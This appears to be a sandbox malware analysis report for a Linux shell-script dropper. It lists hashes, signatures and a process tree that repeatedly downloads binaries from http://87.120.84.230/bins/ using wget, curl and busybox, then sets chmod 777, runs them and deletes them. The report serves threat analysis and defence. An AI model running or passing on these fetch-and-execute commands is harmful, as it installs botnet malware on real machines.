Analysis
-
max time kernel
42s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:16
Static task
static1
Behavioral task
behavioral1
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
-
Size
10KB
-
MD5
62cc0d748ce1bc23e334fb8337b1bf09
-
SHA1
6ad81a5d3316adcab7a039a21fa81bfbcbf8b748
-
SHA256
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6
-
SHA512
276eac78c58b4d7a6fc6421f2ec0499bfda30e027d56c3602575fe6e71f2a006c4ca64db15c7080c252f02c698df1e83702fe82ac41266fcd0cebb3ba32454f5
-
SSDEEP
192:fgZwipsY9skLiE1Zq/7DlJOqDgAimsY9skyxB1Zq/7DHOqDgAiA:fewiBi19a5UAA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1646 chmod 1676 chmod 1694 chmod 1700 chmod 1533 chmod 1539 chmod 1557 chmod 1569 chmod 1614 chmod 1551 chmod 1587 chmod 1608 chmod 1658 chmod 1545 chmod 1563 chmod 1664 chmod 1682 chmod 1688 chmod 1581 chmod 1575 chmod 1602 chmod 1620 chmod 1626 chmod 1593 chmod 1634 chmod 1670 chmod 1640 chmod 1652 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 1534 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 1540 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 1546 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 1552 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 1558 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 1564 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 1570 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 1576 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 1582 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 1588 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 1594 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 1603 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 1609 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 1615 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 1621 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 1627 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 1635 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 1641 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 1647 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 1653 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 1659 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 1665 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 1671 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 1677 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 1683 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 1689 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 1695 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 1701 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl
Processes
-
/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh1⤵PID:1525
-
/bin/rm/bin/rm bins.sh2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1532
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1538
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1544
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1547
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1550
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1556
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1562
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1568
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1574
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1580
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1586
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1592
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1598
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1604
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1607
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1610
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1613
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1619
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1625
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1628
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1633
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1639
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1645
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1651
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1657
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1663
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Writes file to tmp directory
PID:1668
-
-
